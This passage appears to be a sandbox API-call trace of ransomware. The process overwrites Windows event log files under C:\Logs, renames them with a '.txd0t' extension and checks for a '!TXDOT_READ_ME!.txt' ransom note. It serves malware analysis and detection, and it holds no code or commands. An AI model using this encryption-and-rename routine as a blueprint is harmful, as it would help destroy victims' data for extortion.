dwFileAttributes=0x80) returned 1 [0087.813] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.813] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0087.813] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.813] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.814] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.814] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f680*=0x11000, lpOverlapped=0x0) returned 1 [0087.817] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.817] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0x11000, lpOverlapped=0x0) returned 1 [0087.817] FlushFileBuffers (hFile=0x478) returned 1 [0087.820] GetProcessHeap () returned 0xe30000 [0087.820] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xf6) returned 0xe9d750 [0087.820] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Logs\\Key Management Service.evtx" | out: psz1="\\\\?\\C:\\Logs\\Key Management Service.evtx") returned="\\\\?\\C:\\Logs\\Key Management Service.evtx" [0087.821] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Key Management Service.evtx") returned="Key Management Service.evtx" [0087.821] StrCpyW (in: psz1=0xe9d768, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.821] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.821] GetProcessHeap () returned 0xe30000 [0087.821] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0087.821] CloseHandle (hObject=0x478) returned 1 [0087.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Key Management Service.evtx.txd0t" (normalized: "c:\\logs\\key management service.evtx.txd0t")) returned 1 [0087.821] SetEvent (hEvent=0x404) returned 1 [0087.821] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.822] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" [0087.822] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t" [0087.822] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t") returned 0 [0087.823] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0087.823] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.823] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0087.823] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.823] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.824] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.824] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x11000, lpOverlapped=0x0) returned 1 [0087.827] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.827] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x11000, lpOverlapped=0x0) returned 1 [0087.827] FlushFileBuffers (hFile=0x478) returned 1 [0087.830] GetProcessHeap () returned 0xe30000 [0087.830] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0087.830] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" [0087.830] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned="Microsoft-Client-Licensing-Platform%4Admin.evtx" [0087.830] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.830] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.830] GetProcessHeap () returned 0xe30000 [0087.830] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0087.830] CloseHandle (hObject=0x478) returned 1 [0087.831] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.txd0t")) returned 1 [0087.831] SetEvent (hEvent=0x404) returned 1 [0087.831] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.832] StrCpyW (in: psz1=0x414f650, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" [0087.832] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t" [0087.832] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t") returned 0 [0087.832] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", dwFileAttributes=0x80) returned 1 [0087.833] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.833] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0087.833] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.833] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.834] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.834] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f610, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f610*=0x11000, lpOverlapped=0x0) returned 1 [0087.836] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.836] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f614, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f614*=0x11000, lpOverlapped=0x0) returned 1 [0087.837] FlushFileBuffers (hFile=0x478) returned 1 [0087.839] GetProcessHeap () returned 0xe30000 [0087.839] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x15c) returned 0xed0728 [0087.839] StrCpyW (in: psz1=0xed0728, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" [0087.839] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx") returned="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" [0087.839] StrCpyW (in: psz1=0xed0740, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.840] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.840] GetProcessHeap () returned 0xe30000 [0087.840] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0728 | out: hHeap=0xe30000) returned 1 [0087.840] CloseHandle (hObject=0x478) returned 1 [0087.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-application-experience%4program-compatibility-assistant.evtx.txd0t")) returned 1 [0087.840] SetEvent (hEvent=0x404) returned 1 [0087.840] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.841] StrCpyW (in: psz1=0x414f660, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" [0087.841] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t" [0087.841] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t") returned 0 [0087.842] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0087.843] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.843] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=1052672) returned 1 [0087.843] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.843] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.844] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xffefee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.845] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x414f620, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f620*=0x100000, lpOverlapped=0x0) returned 1 [0087.869] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.869] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x414f624, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f624*=0x100000, lpOverlapped=0x0) returned 1 [0087.873] FlushFileBuffers (hFile=0x478) returned 1 [0087.879] GetProcessHeap () returned 0xe30000 [0087.879] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x14e) returned 0xed0728 [0087.879] StrCpyW (in: psz1=0xed0728, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" [0087.879] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx") returned="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" [0087.879] StrCpyW (in: psz1=0xed0740, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.879] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.879] GetProcessHeap () returned 0xe30000 [0087.880] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0728 | out: hHeap=0xe30000) returned 1 [0087.880] CloseHandle (hObject=0x478) returned 1 [0087.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx.txd0t")) returned 1 [0087.880] SetEvent (hEvent=0x404) returned 1 [0087.880] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.881] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" [0087.881] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t" [0087.881] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t") returned 0 [0087.882] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx", dwFileAttributes=0x80) returned 1 [0087.882] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.882] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0087.882] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.882] WriteFile (in: hFile=0x478, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.883] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.883] ReadFile (in: hFile=0x478, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x11000, lpOverlapped=0x0) returned 1 [0087.886] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.886] WriteFile (in: hFile=0x478, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x11000, lpOverlapped=0x0) returned 1 [0087.890] FlushFileBuffers (hFile=0x478) returned 1 [0087.934] GetProcessHeap () returned 0xe30000 [0087.934] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11a) returned 0xe9b648 [0087.934] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" [0087.934] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned="Microsoft-Windows-AppLocker%4EXE and DLL.evtx" [0087.935] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.935] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.935] GetProcessHeap () returned 0xe30000 [0087.935] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0087.935] CloseHandle (hObject=0x478) returned 1 [0087.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx.txd0t")) returned 1 [0087.936] SetEvent (hEvent=0x404) returned 1 [0087.936] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.939] StrCpyW (in: psz1=0x414f680, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" [0087.939] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t" [0087.939] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t") returned 0 [0087.939] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx", dwFileAttributes=0x80) returned 1 [0087.939] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0087.939] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0087.939] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.939] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0087.940] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.940] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x414f640, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f640*=0x11000, lpOverlapped=0x0) returned 1 [0087.945] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.945] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f644, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f644*=0x11000, lpOverlapped=0x0) returned 1 [0087.945] FlushFileBuffers (hFile=0x474) returned 1 [0087.953] GetProcessHeap () returned 0xe30000 [0087.953] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x130) returned 0xe9b648 [0087.953] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" [0087.953] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx") returned="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" [0087.953] StrCpyW (in: psz1=0xe9b660, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0087.953] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0087.953] GetProcessHeap () returned 0xe30000 [0087.953] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0087.953] CloseHandle (hObject=0x474) returned 1 [0087.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-applocker%4packaged app-execution.evtx.txd0t")) returned 1 [0087.954] SetEvent (hEvent=0x404) returned 1 [0087.954] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0087.957] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" [0087.957] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t" [0087.957] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t") returned 0 [0087.957] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx", dwFileAttributes=0x80) returned 1 [0087.968] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0087.968] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=69632) returned 1 [0087.968] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.969] WriteFile (in: hFile=0x478, 